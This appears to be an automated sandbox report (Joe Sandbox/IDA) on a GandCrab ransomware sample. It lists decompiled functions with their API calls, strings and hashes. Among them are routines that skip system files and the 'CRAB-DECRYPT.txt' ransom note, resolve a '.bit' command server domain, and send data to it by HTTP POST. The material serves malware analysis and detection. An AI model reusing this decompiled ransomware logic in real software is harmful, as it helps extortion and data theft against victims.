SetHandleInformation.KERNEL32(00000001,00000000), ref: 0FE651AF
VirtualAlloc.KERNEL32(00000000,00002800,00003000,00000004), ref: 0FE651C3
wsprintfW.USER32 ref: 0FE651D4
VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 0FE651F5

Strings

o, xrefs: 0FE65103
l, xrefs: 0FE6508B
r, xrefs: 0FE650D9
a, xrefs: 0FE6513B
r, xrefs: 0FE65134
S, xrefs: 0FE650BD
n, xrefs: 0FE6511F
fabian wosar <3, xrefs: 0FE65204
, xrefs: 0FE650B6
n, xrefs: 0FE6506D
1, xrefs: 0FE650CB
a, xrefs: 0FE650E0
v, xrefs: 0FE6512D
S, xrefs: 0FE65118
n, xrefs: 0FE650F5
r, xrefs: 0FE650EE
n, xrefs: 0FE650C4
, xrefs: 0FE65111
v, xrefs: 0FE650D2
u, xrefs: 0FE650AF
l, xrefs: 0FE650FC
u, xrefs: 0FE6510A
o, xrefs: 0FE65095
r, xrefs: 0FE65149
2, xrefs: 0FE65126
h, xrefs: 0FE650E7
h, xrefs: 0FE65142

Memory Dump Source

Source File: 00000002.00000002.370313437.000000000FE61000.00000020.00000001.01000000.00000004.sdmp, Offset: 0FE60000, based on PE: true

Associated: 00000002.00000002.370270818.000000000FE60000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.370323598.000000000FE6A000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.370333139.000000000FE72000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.370340833.000000000FE74000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_fe60000_ssapst.jbxd

Yara matches

Similarity

API ID: CreateHandleInformationPipeVirtual$AllocFreewsprintf
String ID: $ $1$2$S$S$a$a$fabian wosar <3$h$h$l$l$n$n$n$n$o$o$r$r$r$r$u$u$v$v
API String ID: 1490407255-3072057902
Opcode ID: cd7f4907459290998af5364cfc09b9f77cf8b25065e4273b0dadcada2c293bd0
Instruction ID: 9641e29ca0e00097d2c71d59e09c7bccdf2470e88703f155eef64d0414c9086f
Opcode Fuzzy Hash: cd7f4907459290998af5364cfc09b9f77cf8b25065e4273b0dadcada2c293bd0
Instruction Fuzzy Hash: 77413CB0E4030CABEB10CF95DC487EEBFB6EB05B59F104129E514BA282D7FA45598F94

Uniqueness

Uniqueness Score: -1.00%

Function 0FE668F0 Relevance: 31.6, APIs: 11, Strings: 10, Instructions: 78
stringCOMMON

Download Yara Rule

C-Code - Quality: 93%

			E0FE668F0(WCHAR* __ecx) {
				int _t4;
				signed int _t5;
				signed int _t15;
				void* _t19;
				WCHAR* _t21;
				short* _t25;
				WCHAR* _t26;

				_t21 = __ecx;
				_t4 = lstrlenW(__ecx);
				_t5 = lstrlenW(_t21);
				_t1 = _t21 - 2; // -2
				_t25 = _t1 + _t5 * 2;
				_t19 = _t4 - 1;
				if(_t19 != 0) {
					do {
						_t25 = _t25 - 2;
						_t19 = _t19 - 1;
					} while ( *_t25 != 0x5c && _t19 != 0);
				}
				_t26 = _t25 + 2;
				if(lstrcmpiW(_t26, L"desktop.ini") != 0) {
					if(lstrcmpiW(_t26, L"autorun.inf") == 0 || lstrcmpiW(_t26, L"ntuser.dat") == 0 || lstrcmpiW(_t26, L"iconcache.db") == 0 || lstrcmpiW(_t26, L"bootsect.bak") == 0 || lstrcmpiW(_t26, L"boot.ini") == 0 || lstrcmpiW(_t26, L"ntuser.dat.log") == 0 || lstrcmpiW(_t26, L"thumbs.db") == 0) {
						goto L5;
					} else {
						_t15 = lstrcmpiW(_t26, L"CRAB-DECRYPT.txt");
						asm("sbb eax, eax");
						return  ~_t15 + 1;
					}
				} else {
					L5:
					return 1;
				}
			}

0x0fe668f9
0x0fe668fc
0x0fe66901
0x0fe66903
0x0fe66906
0x0fe66909
0x0fe6690a
0x0fe66910
0x0fe66910
0x0fe66913
0x0fe66914
0x0fe66910
0x0fe66924
0x0fe66931
0x0fe66946
0x00000000
0x0fe66990
0x0fe66996
0x0fe6699b
0x0fe669a0
0x0fe669a0
0x0fe66935
0x0fe66935
0x0fe6693b
0x0fe6693b

APIs

lstrlenW.KERNEL32(00000000,00000010,00000000,00000000,0FE66B03), ref: 0FE668FC
lstrlenW.KERNEL32(00000000), ref: 0FE66901
lstrcmpiW.KERNEL32(-00000004,desktop.ini), ref: 0FE6692D
lstrcmpiW.KERNEL32(-00000004,autorun.inf), ref: 0FE66942
lstrcmpiW.KERNEL32(-00000004,ntuser.dat), ref: 0FE6694E
lstrcmpiW.KERNEL32(-00000004,iconcache.db), ref: 0FE6695A
lstrcmpiW.KERNEL32(-00000004,bootsect.bak), ref: 0FE66966
lstrcmpiW.KERNEL32(-00000004,boot.ini), ref: 0FE66972
lstrcmpiW.KERNEL32(-00000004,ntuser.dat.log), ref: 0FE6697E
lstrcmpiW.KERNEL32(-00000004,thumbs.db), ref: 0FE6698A
lstrcmpiW.KERNEL32(-00000004,CRAB-DECRYPT.txt), ref: 0FE66996

Strings

desktop.ini, xrefs: 0FE66927
bootsect.bak, xrefs: 0FE66960
autorun.inf, xrefs: 0FE6693C
ntuser.dat, xrefs: 0FE66948
iqt, xrefs: 0FE6691E
thumbs.db, xrefs: 0FE66984
iconcache.db, xrefs: 0FE66954
CRAB-DECRYPT.txt, xrefs: 0FE66990
ntuser.dat.log, xrefs: 0FE66978
boot.ini, xrefs: 0FE6696C

Memory Dump Source

Source File: 00000002.00000002.370313437.000000000FE61000.00000020.00000001.01000000.00000004.sdmp, Offset: 0FE60000, based on PE: true

Associated: 00000002.00000002.370270818.000000000FE60000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.370323598.000000000FE6A000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.370333139.000000000FE72000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.370340833.000000000FE74000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_fe60000_ssapst.jbxd

Yara matches

Similarity

API ID: lstrcmpi$lstrlen
String ID: iqt$CRAB-DECRYPT.txt$autorun.inf$boot.ini$bootsect.bak$desktop.ini$iconcache.db$ntuser.dat$ntuser.dat.log$thumbs.db
API String ID: 203586893-3181620209
Opcode ID: 7a89e7ce00c1c4b6e0a04c250c8e01f5b51b8af7519a0fc304c7c5aa3c35d6cf
Instruction ID: 158cbf04643e625d40870c12bc8b0b96de55c34263a14e8c6dab9ae17492e745
Opcode Fuzzy Hash: 7a89e7ce00c1c4b6e0a04c250c8e01f5b51b8af7519a0fc304c7c5aa3c35d6cf
Instruction Fuzzy Hash: 831106627D06AE355A20367DAC01DEF379C5EE1AE83452121FD00F6023FF85EA0247B4

Uniqueness

Uniqueness Score: -1.00%

Function 0FE66780 Relevance: 28.1, APIs: 7, Strings: 9, Instructions: 124
memoryCOMMON

Download Yara Rule

C-Code - Quality: 19%

			E0FE66780(void* __ecx) {
				void* _t12;
				intOrPtr* _t23;
				void* _t51;
				void* _t52;

				_t52 = __ecx;
				_t51 = VirtualAlloc(0, 0x201, 0x3000, 0x40);
				if(E0FE681F0(_t52, L"\\ProgramData\\") != 0 || E0FE681F0(_t52, L"\\IETldCache\\") != 0 || E0FE681F0(_t52, L"\\Boot\\") != 0 || E0FE681F0(_t52, L"\\Program Files\\") != 0 || E0FE681F0(_t52, L"\\Tor Browser\\") != 0 || E0FE681F0(_t52, L"Ransomware") != 0 || E0FE681F0(_t52, L"\\All Users\\") != 0 || E0FE681F0(_t52, L"\\Local Settings\\") != 0) {
					L18:
					VirtualFree(_t51, 0, 0x8000);
					return 0;
				} else {
					_t12 = E0FE681F0(_t52, L"\\Windows\\");
					if(_t12 != 0) {
						goto L18;
					} else {
						_t23 = __imp__SHGetSpecialFolderPathW;
						_push(_t12);
						_push(0x2a);
						_push(_t51);
						_push(_t12);
						if( *_t23() == 0 || E0FE681F0(_t52, _t51) == 0) {
							_push(0);
							_push(0x2b);
							_push(_t51);
							_push(0);
							if( *_t23() == 0 || E0FE681F0(_t52, _t51) == 0) {
								_push(0);
								_push(0x24);
								_push(_t51);
								_push(0);
								if( *_t23() == 0 || E0FE681F0(_t52, _t51) == 0) {
									_push(0);
									_push(0x1c);
									_push(_t51);
									_push(0);
									if( *_t23() == 0 || E0FE681F0(_t52, _t51) == 0) {
										VirtualFree(_t51, 0, 0x8000);
										return 1;
									} else {
										goto L18;
									}
								} else {
									goto L18;
								}
							} else {
								goto L18;
							}
						} else {
							goto L18;
						}
					}
				}
			}

0x0fe66791
0x0fe667a0
0x0fe667a9
0x0fe668d4
0x0fe668dd
0x0fe668e8
0x0fe6683b
0x0fe66842
0x0fe66849
0x00000000
0x0fe6684f
0x0fe6684f
0x0fe66855
0x0fe66856
0x0fe66858
0x0fe66859
0x0fe6685e
0x0fe6686d
0x0fe6686f
0x0fe66871
0x0fe66872
0x0fe66878
0x0fe66887
0x0fe66889
0x0fe6688b
0x0fe6688c
0x0fe66892
0x0fe668a1
0x0fe668a3
0x0fe668a5
0x0fe668a6
0x0fe668ac
0x0fe668c8
0x0fe668d3
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x0fe6685e
0x0fe66849

APIs

VirtualAlloc.KERNEL32(00000000,00000201,00003000,00000040,00000000,?,?,0FE66E06,00000000,?,?), ref: 0FE66793
SHGetSpecialFolderPathW.SHELL32(00000000,00000000,0000002A,00000000,?,?,0FE66E06,00000000,?,?), ref: 0FE6685A
SHGetSpecialFolderPathW.SHELL32(00000000,00000000,0000002B,00000000,?,?,0FE66E06,00000000,?,?), ref: 0FE66874
SHGetSpecialFolderPathW.SHELL32(00000000,00000000,00000024,00000000,?,?,0FE66E06,00000000,?,?), ref: 0FE6688E
SHGetSpecialFolderPathW.SHELL32(00000000,00000000,0000001C,00000000,?,?,0FE66E06,00000000,?,?), ref: 0FE668A8
VirtualFree.KERNEL32(00000000,00000000,00008000,?,?,0FE66E06,00000000,?,?), ref: 0FE668C8
VirtualFree.KERNEL32(00000000,00000000,00008000,?,?,0FE66E06,00000000,?,?), ref: 0FE668DD

Strings

\Program Files\, xrefs: 0FE667D7
Ransomware, xrefs: 0FE667FF
\Boot\, xrefs: 0FE667C3
\IETldCache\, xrefs: 0FE667AF
\Tor Browser\, xrefs: 0FE667EB
\Windows\, xrefs: 0FE6683B
\Local Settings\, xrefs: 0FE66827
\All Users\, xrefs: 0FE66813
\ProgramData\, xrefs: 0FE66799

Memory Dump Source

Source File: 00000002.00000002.370313437.000000000FE61000.00000020.00000001.01000000.00000004.sdmp, Offset: 0FE60000, based on PE: true

Associated: 00000002.00000002.370270818.000000000FE60000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.370323598.000000000FE6A000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.370333139.000000000FE72000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.370340833.000000000FE74000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_fe60000_ssapst.jbxd

Yara matches

Similarity

API ID: FolderPathSpecial$Virtual$Free$Alloc
String ID: Ransomware$\All Users\$\Boot\$\IETldCache\$\Local Settings\$\Program Files\$\ProgramData\$\Tor Browser\$\Windows\
API String ID: 1363212851-3735464813
Opcode ID: 07637ed39bd73cb24103e30357c404ab9254a7b881e1f3bbcd4ae3dbdf623fb2
Instruction ID: 4cf1bed6ec28eeb7ba50b1acfaa18d05a63ef87d65a4b1fcab1076b7820a77d4
Opcode Fuzzy Hash: 07637ed39bd73cb24103e30357c404ab9254a7b881e1f3bbcd4ae3dbdf623fb2
Instruction Fuzzy Hash: E4310C207D476D23ED2423761D15B2F559A8FC5AD9F507026EA01EE2C3FF58ED0283AA

Uniqueness

Uniqueness Score: -1.00%

Function 0FE65220 Relevance: 24.6, APIs: 8, Strings: 6, Instructions: 91
memorystringsleepCOMMON

Download Yara Rule

C-Code - Quality: 86%

			E0FE65220() {
				WCHAR* _v8;
				intOrPtr _v12;
				char _v16;
				intOrPtr _v20;
				char _v24;
				char* _v28;
				char* _v32;
				char* _v36;
				short _v40;
				char _v56;
				short _v60;
				intOrPtr _v64;
				char _v80;
				WCHAR* _t26;
				intOrPtr _t27;
				long _t32;
				WCHAR* _t37;
				void* _t39;
				signed int _t40;
				signed int _t41;
				signed int _t45;
				void* _t48;
				WCHAR* _t49;
				void* _t52;
				void* _t53;

				asm("movdqa xmm0, [0xfe70540]");
				_v36 =  &_v56;
				asm("movdqu [ebp-0x34], xmm0");
				_v32 =  &_v80;
				asm("movdqa xmm0, [0xfe70520]");
				_v40 = 0x74;
				asm("movdqu [ebp-0x4c], xmm0");
				_v64 = 0x69622e6d;
				_v60 = 0x74;
				_v24 = 0x62636467;
				_v20 = 0x7469622e;
				_v16 = 0;
				_v28 =  &_v24;
				_t26 = VirtualAlloc(0, 0x100, 0x3000, 4);
				_t37 = _t26;
				_v8 = _t37;
				if(_t37 != 0) {
					_t40 = 0;
					_t48 = 1;
					_t45 = 0;
					while(1) {
						_t27 =  *((intOrPtr*)(_t52 + _t45 * 4 - 0x20));
						_t45 = _t45 + 1;
						_v12 = _t27;
						if(_t45 == 3) {
							asm("sbb esi, esi");
							_t48 =  ~(_t48 - 1) + 2;
							_t45 = 0;
						}
						if(_t40 == 0xffffffff) {
							Sleep(0x3e8);
						}
						_t39 = VirtualAlloc(0, 2 + lstrlenW(_t37) * 2, 0x3000, 4);
						_t41 = _t39;
						E0FE65060(_t41, _v12, _t48);
						_t53 = _t53 + 4;
						_t32 = lstrcmpiA(_t39, "fabian wosar <3");
						if(_t32 != 0) {
							break;
						}
						VirtualFree(_t39, _t32, 0x8000);
						_t37 = _v8;
						_t40 = _t41 | 0xffffffff;
					}
					_t49 = _v8;
					wsprintfW(_t49, L"%S", _t39);
					VirtualFree(_t39, 0, 0x8000);
					_t26 = _t49;
				}
				return _t26;
			}

0x0fe65226
0x0fe65236
0x0fe65241
0x0fe65246
0x0fe6524c
0x0fe6525b
0x0fe65261
0x0fe65266
0x0fe6526d
0x0fe65273
0x0fe6527a
0x0fe65281
0x0fe65285
0x0fe65288
0x0fe6528e
0x0fe65290
0x0fe65295
0x0fe6529b
0x0fe6529d
0x0fe652a2
0x0fe652a4
0x0fe652a4
0x0fe652a8
0x0fe652a9
0x0fe652af
0x0fe652b4
0x0fe652b6
0x0fe652b9
0x0fe652b9
0x0fe652be
0x0fe652c5
0x0fe652c5
0x0fe652ec
0x0fe652ef
0x0fe652f1
0x0fe652f6
0x0fe652ff
0x0fe65307
0x00000000
0x00000000
0x0fe65310
0x0fe65316
0x0fe65319
0x0fe65319
0x0fe6531e
0x0fe65328
0x0fe65339
0x0fe6533f
0x0fe6533f
0x0fe65347

APIs

VirtualAlloc.KERNEL32(00000000,00000100,00003000,00000004,00000000,00000000,00000000), ref: 0FE65288
Sleep.KERNEL32(000003E8), ref: 0FE652C5
lstrlenW.KERNEL32(00000000,00003000,00000004), ref: 0FE652D3
VirtualAlloc.KERNEL32(00000000,00000000), ref: 0FE652E3
lstrcmpiA.KERNEL32(00000000,fabian wosar <3), ref: 0FE652FF
VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 0FE65310
wsprintfW.USER32 ref: 0FE65328
VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 0FE65339

Strings

fabian wosar <3, xrefs: 0FE652F9
t, xrefs: 0FE6526D
t, xrefs: 0FE6525B
gdcb, xrefs: 0FE65273
m.bi, xrefs: 0FE65266
.bit, xrefs: 0FE6527A

Memory Dump Source

Source File: 00000002.00000002.370313437.000000000FE61000.00000020.00000001.01000000.00000004.sdmp, Offset: 0FE60000, based on PE: true

Associated: 00000002.00000002.370270818.000000000FE60000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.370323598.000000000FE6A000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.370333139.000000000FE72000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.370340833.000000000FE74000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_fe60000_ssapst.jbxd

Yara matches

Similarity

API ID: Virtual$AllocFree$Sleeplstrcmpilstrlenwsprintf
String ID: .bit$fabian wosar <3$gdcb$m.bi$t$t
API String ID: 2709691373-2847225850
Opcode ID: ab92756926ed50f0f1c1e8242929dfa47e580ae93b41cd3fe15e6905a960c953
Instruction ID: d341d2ad9c99ce60f486a8e28ed0f16ce969cf60506caa64e3876edc8e5e05ce
Opcode Fuzzy Hash: ab92756926ed50f0f1c1e8242929dfa47e580ae93b41cd3fe15e6905a960c953
Instruction Fuzzy Hash: E13107B1E4030DABDB10CFA5ED85BAEBBB8FF45B65F101125F605B6281DB785A008B90

Uniqueness

Uniqueness Score: -1.00%

Function 0FE654F0 Relevance: 22.9, APIs: 11, Strings: 2, Instructions: 117
stringmemorynetworkCOMMON

Download Yara Rule

C-Code - Quality: 22%

			E0FE654F0(CHAR* __ecx, CHAR** __edx, intOrPtr _a8) {
				void* _v8;
				CHAR* _v12;
				void* _v16;
				CHAR** _v20;
				void* _v24;
				char _v28;
				short _v124;
				void* _t40;
				CHAR* _t44;
				CHAR* _t46;
				void* _t47;
				void* _t55;
				void* _t56;
				CHAR* _t58;
				void* _t59;

				_t46 = __ecx;
				_v20 = __edx;
				_v12 = __ecx;
				E0FE67E40( &_v28);
				_v16 = E0FE65220();
				_t55 = 0x400 + lstrlenA(_t46) * 2;
				_t7 = _t55 + 1; // 0x1
				_t47 = VirtualAlloc(0, _t7, 0x3000, 0x40);
				_v8 = VirtualAlloc(0, 0x32001, 0x3000, 0x40);
				if(_t47 == 0) {
					L3:
					_t58 = 0;
					L4:
					lstrcatA(_t58, _v12);
					asm("movdqu xmm0, [0xfe6fb40]");
					asm("movdqu [ebp-0x78], xmm0");
					asm("movdqu xmm0, [0xfe6fb50]");
					asm("movdqu [ebp-0x68], xmm0");
					asm("movdqu xmm0, [0xfe6fb60]");
					asm("movdqu [ebp-0x58], xmm0");
					asm("movdqu xmm0, [0xfe6fb70]");
					asm("movdqu [ebp-0x48], xmm0");
					asm("movdqu xmm0, [0xfe6fb80]");
					asm("movdqu [ebp-0x38], xmm0");
					asm("movdqu xmm0, [0xfe6fb90]");
					asm("movdqu [ebp-0x28], xmm0");
					lstrlenA(_t58);
					_t56 = 0;
					_push(lstrlenW( &_v124));
					_push( &_v124);
					_push(L"POST");
					_push(0x31fff);
					_push(_v8);
					_push(lstrlenA(_t58));
					_push(_t58);
					_t59 = _v16;
					_push(L"popkadurak");
					_push(_t59);
					if(E0FE68050( &_v28) != 0) {
						_t56 = 1;
						if(_a8 != 0) {
							_v12 = 0;
							if(E0FE653D0(_v8,  &_v12) == 0) {
								_t56 = 0;
							} else {
								_t44 = _v12;
								if(_t44 != 0) {
									 *_v20 = _t44;
								}
							}
						}
					}
					VirtualFree(_t59, 0, 0x8000);
					VirtualFree(_v8, 0, 0x8000);
					VirtualFree(_t47, 0, 0x8000);
					_t40 = _v24;
					if(_t40 != 0) {
						InternetCloseHandle(_t40);
					}
					return _t56;
				}
				_t9 = _t55 + 1; // 0x1
				if(_t55 >= _t9) {
					goto L3;
				} else {
					_t58 = _t47;
					goto L4;
				}
			}

0x0fe654f8
0x0fe654fa
0x0fe65501
0x0fe65504
0x0fe6550f
0x0fe65525
0x0fe6552c
0x0fe65542
0x0fe65546
0x0fe6554b
0x0fe65558
0x0fe65558
0x0fe6555a
0x0fe6555e
0x0fe65564
0x0fe6556d
0x0fe65572
0x0fe6557a
0x0fe6557f
0x0fe65587
0x0fe6558c
0x0fe65594
0x0fe65599
0x0fe655a1
0x0fe655a6
0x0fe655ae
0x0fe655b3
0x0fe655bc
0x0fe655c5
0x0fe655c9
0x0fe655ca
0x0fe655d2
0x0fe655d7
0x0fe655e1
0x0fe655e2
0x0fe655e3
0x0fe655e9
0x0fe655ee
0x0fe655f6
0x0fe655fc
0x0fe65601
0x0fe65609
0x0fe65617
0x0fe65627
0x0fe65619
0x0fe65619
0x0fe6561e
0x0fe65623
0x0fe65623
0x0fe6561e
0x0fe65617
0x0fe65601
0x0fe65637
0x0fe65643
0x0fe6564d
0x0fe6564f
0x0fe65654
0x0fe65657
0x0fe65657
0x0fe65665
0x0fe65665
0x0fe6554d
0x0fe65552
0x00000000
0x0fe65554
0x0fe65554
0x00000000
0x0fe65554

APIs

Part of subcall function 0FE67E40: InternetOpenW.WININET(?,00000000,00000000,00000000,00000000), ref: 0FE68024
Part of subcall function 0FE67E40: InternetOpenW.WININET(006F004D,00000001,00000000,00000000,10000000), ref: 0FE6803D

Part of subcall function 0FE65220: VirtualAlloc.KERNEL32(00000000,00000100,00003000,00000004,00000000,00000000,00000000), ref: 0FE65288
Part of subcall function 0FE65220: Sleep.KERNEL32(000003E8), ref: 0FE652C5
Part of subcall function 0FE65220: lstrlenW.KERNEL32(00000000,00003000,00000004), ref: 0FE652D3
Part of subcall function 0FE65220: VirtualAlloc.KERNEL32(00000000,00000000), ref: 0FE652E3
Part of subcall function 0FE65220: lstrcmpiA.KERNEL32(00000000,fabian wosar <3), ref: 0FE652FF
Part of subcall function 0FE65220: VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 0FE65310
Part of subcall function 0FE65220: wsprintfW.USER32 ref: 0FE65328
Part of subcall function 0FE65220: VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 0FE65339

lstrlenA.KERNEL32(00000000,00000000,00000000,74716980), ref: 0FE65512
VirtualAlloc.KERNEL32(00000000,00000001,00003000,00000040), ref: 0FE65532
VirtualAlloc.KERNEL32(00000000,00032001,00003000,00000040), ref: 0FE65544
lstrcatA.KERNEL32(00000000,?), ref: 0FE6555E
lstrlenA.KERNEL32(00000000), ref: 0FE655B3
lstrlenW.KERNEL32(?), ref: 0FE655BF
lstrlenA.KERNEL32(00000000,00000000,00031FFF,?,00000000), ref: 0FE655DB
VirtualFree.KERNEL32(00000000,00000000,00008000,00000000,popkadurak,00000000,00000000,?,00000000), ref: 0FE65637
VirtualFree.KERNEL32(00000000,00000000,00008000,?,00000000), ref: 0FE65643
VirtualFree.KERNEL32(00000000,00000000,00008000,?,00000000), ref: 0FE6564D
InternetCloseHandle.WININET(0FE6581B), ref: 0FE65657

Strings

POST, xrefs: 0FE655CA
popkadurak, xrefs: 0FE655E9

Memory Dump Source

Source File: 00000002.00000002.370313437.000000000FE61000.00000020.00000001.01000000.00000004.sdmp, Offset: 0FE60000, based on PE: true

Associated: 00000002.00000002.370270818.000000000FE60000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.370323598.000000000FE6A000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.370333139.000000000FE72000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.370340833.000000000FE74000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_fe60000_ssapst.jbxd

Yara matches

Similarity

API ID: Virtual$Freelstrlen$Alloc$Internet$Open$CloseHandleSleeplstrcatlstrcmpiwsprintf
String ID: POST$popkadurak
API String ID: 2554059081-2707760125
Opcode ID: e5a1d407507e11589604da57131df7eb8d1562c3607deb6929a0463234bf3f00
Instruction ID: 6a7cabdf212d4ecb8b9d04bd7e673ca4172f50c71e0a4f7bf771c0d1eed97b00
Opcode Fuzzy Hash: e5a1d407507e11589604da57131df7eb8d1562c3607deb6929a0463234bf3f00
Instruction Fuzzy Hash: 37410471E4034EAAEB109FA9DC55FEEBB78FF89795F102115EA00B3141EB786644CB90

Uniqueness

Uniqueness Score: -1.00%

Function 0FE672A0 Relevance: 20.1, APIs: 16, Instructions: 120
stringCOMMON

Download Yara Rule

C-Code - Quality: 93%

			E0FE672A0(intOrPtr* __ecx) {
				int _t42;
				int _t48;
				int _t51;
				int _t54;
				int _t57;
				int _t60;
				int _t63;
				int _t66;
				int _t70;
				int _t72;
				void* _t75;
				intOrPtr* _t86;
				int _t88;
				int _t89;
				int _t90;
				int _t91;
				int _t92;
				int _t93;
				int _t94;
				void* _t95;

				_t40 = lstrlenW;
				_t86 = __ecx;
				_t75 = 0;
				if( *__ecx != 0) {
					_t72 = lstrlenW( *(__ecx + 8));
					_t3 = lstrlenW( *(_t86 + 4)) + 4; // 0x4
					_t40 = lstrlenW;
					_t75 = _t3 + _t72;
				}
				if( *((intOrPtr*)(_t86 + 0xc)) != 0) {
					_t95 =  *_t40( *((intOrPtr*)(_t86 + 0x14)));
					_t70 = lstrlenW( *(_t86 + 0x10));
					_t7 = _t95 + 4; // 0x4
					_t75 = _t7 + _t70 + _t75;
				}
				if( *((intOrPtr*)(_t86 + 0x18)) != 0) {
					_t94 = lstrlenW( *(_t86 + 0x20));
					_t66 = lstrlenW( *(_t86 + 0x1c));
					_t11 = _t94 + 4; // 0x4
					_t75 = _t11 + _t66 + _t75;
				}
				if( *((intOrPtr*)(_t86 + 0x24)) != 0) {
					_t93 = lstrlenW( *(_t86 + 0x2c));
					_t63 = lstrlenW( *(_t86 + 0x28));
					_t15 = _t93 + 4; // 0x4
					_t75 = _t15 + _t63 + _t75;
				}
				if( *((intOrPtr*)(_t86 + 0x30)) != 0) {
					_t92 = lstrlenW( *(_t86 + 0x38));
					_t60 = lstrlenW( *(_t86 + 0x34));
					_t19 = _t92 + 4; // 0x4
					_t75 = _t19 + _t60 + _t75;
				}
				if( *((intOrPtr*)(_t86 + 0x3c)) != 0) {
					_t91 = lstrlenW( *(_t86 + 0x44));
					_t57 = lstrlenW( *(_t86 + 0x40));
					_t23 = _t91 + 4; // 0x4
					_t75 = _t23 + _t57 + _t75;
				}
				if( *((intOrPtr*)(_t86 + 0x48)) != 0) {
					_t90 = lstrlenW( *(_t86 + 0x50));
					_t54 = lstrlenW( *(_t86 + 0x4c));
					_t27 = _t90 + 4; // 0x4
					_t75 = _t27 + _t54 + _t75;
				}
				if( *((intOrPtr*)(_t86 + 0x54)) != 0) {
					_t89 = lstrlenW( *(_t86 + 0x5c));
					_t51 = lstrlenW( *(_t86 + 0x58));
					_t31 = _t89 + 4; // 0x4
					_t75 = _t31 + _t51 + _t75;
				}
				if( *((intOrPtr*)(_t86 + 0x60)) != 0) {
					_t75 = _t75 + 0x14;
				}
				if( *((intOrPtr*)(_t86 + 0x74)) != 0) {
					_t88 = lstrlenW( *(_t86 + 0x7c));
					_t48 = lstrlenW( *(_t86 + 0x78));
					_t36 = _t88 + 4; // 0x4
					_t75 = _t36 + _t48 + _t75;
				}
				if( *((intOrPtr*)(_t86 + 0x80)) == 0) {
					return _t75;
				} else {
					_t42 = lstrlenW( *(_t86 + 0x88));
					return lstrlenW( *(_t86 + 0x84)) + 4 + _t75 + _t42;
				}
			}

0x0fe672a0
0x0fe672a8
0x0fe672aa
0x0fe672ae
0x0fe672b3
0x0fe672c1
0x0fe672c4
0x0fe672c9
0x0fe672c9
0x0fe672cf
0x0fe672d9
0x0fe672e0
0x0fe672e4
0x0fe672e7
0x0fe672e7
0x0fe672ed
0x0fe672fb
0x0fe672fd
0x0fe67305
0x0fe67308
0x0fe67308
0x0fe6730e
0x0fe6731c
0x0fe6731e
0x0fe67326
0x0fe67329
0x0fe67329
0x0fe6732f
0x0fe6733d
0x0fe6733f
0x0fe67347
0x0fe6734a
0x0fe6734a
0x0fe67350
0x0fe6735e
0x0fe67360
0x0fe67368
0x0fe6736b
0x0fe6736b
0x0fe67371
0x0fe6737f
0x0fe67381
0x0fe67389
0x0fe6738c
0x0fe6738c
0x0fe67392
0x0fe673a0
0x0fe673a2
0x0fe673aa
0x0fe673ad
0x0fe673ad
0x0fe673b3
0x0fe673b5
0x0fe673b5
0x0fe673bc
0x0fe673ca
0x0fe673cc
0x0fe673d4
0x0fe673d7
0x0fe673d7
0x0fe673e0
0x0fe6740c
0x0fe673e2
0x0fe673e8
0x0fe67406
0x0fe67406

APIs

lstrlenW.KERNEL32(?,?,?,?,0FE64819,00000000,?,00000000,00000000,?,00000000), ref: 0FE672F2
lstrlenW.KERNEL32(?,?,?,?,0FE64819,00000000,?,00000000,00000000,?,00000000), ref: 0FE672FD
lstrlenW.KERNEL32(?,?,?,?,0FE64819,00000000,?,00000000,00000000,?,00000000), ref: 0FE67313
lstrlenW.KERNEL32(?,?,?,?,0FE64819,00000000,?,00000000,00000000,?,00000000), ref: 0FE6731E
lstrlenW.KERNEL32(?,?,?,?,0FE64819,00000000,?,00000000,00000000,?,00000000), ref: 0FE67334
lstrlenW.KERNEL32(?,?,?,?,0FE64819,00000000,?,00000000,00000000,?,00000000), ref: 0FE6733F
lstrlenW.KERNEL32(?,?,?,?,0FE64819,00000000,?,00000000,00000000,?,00000000), ref: 0FE67355
lstrlenW.KERNEL32(0FE64B36,?,?,?,0FE64819,00000000,?,00000000,00000000,?,00000000), ref: 0FE67360
lstrlenW.KERNEL32(?,?,?,?,0FE64819,00000000,?,00000000,00000000,?,00000000), ref: 0FE67376
lstrlenW.KERNEL32(?,?,?,?,0FE64819,00000000,?,00000000,00000000,?,00000000), ref: 0FE67381
lstrlenW.KERNEL32(?,?,?,?,0FE64819,00000000,?,00000000,00000000,?,00000000), ref: 0FE67397
lstrlenW.KERNEL32(?,?,?,?,0FE64819,00000000,?,00000000,00000000,?,00000000), ref: 0FE673A2
lstrlenW.KERNEL32(?,?,?,?,0FE64819,00000000,?,00000000,00000000,?,00000000), ref: 0FE673C1
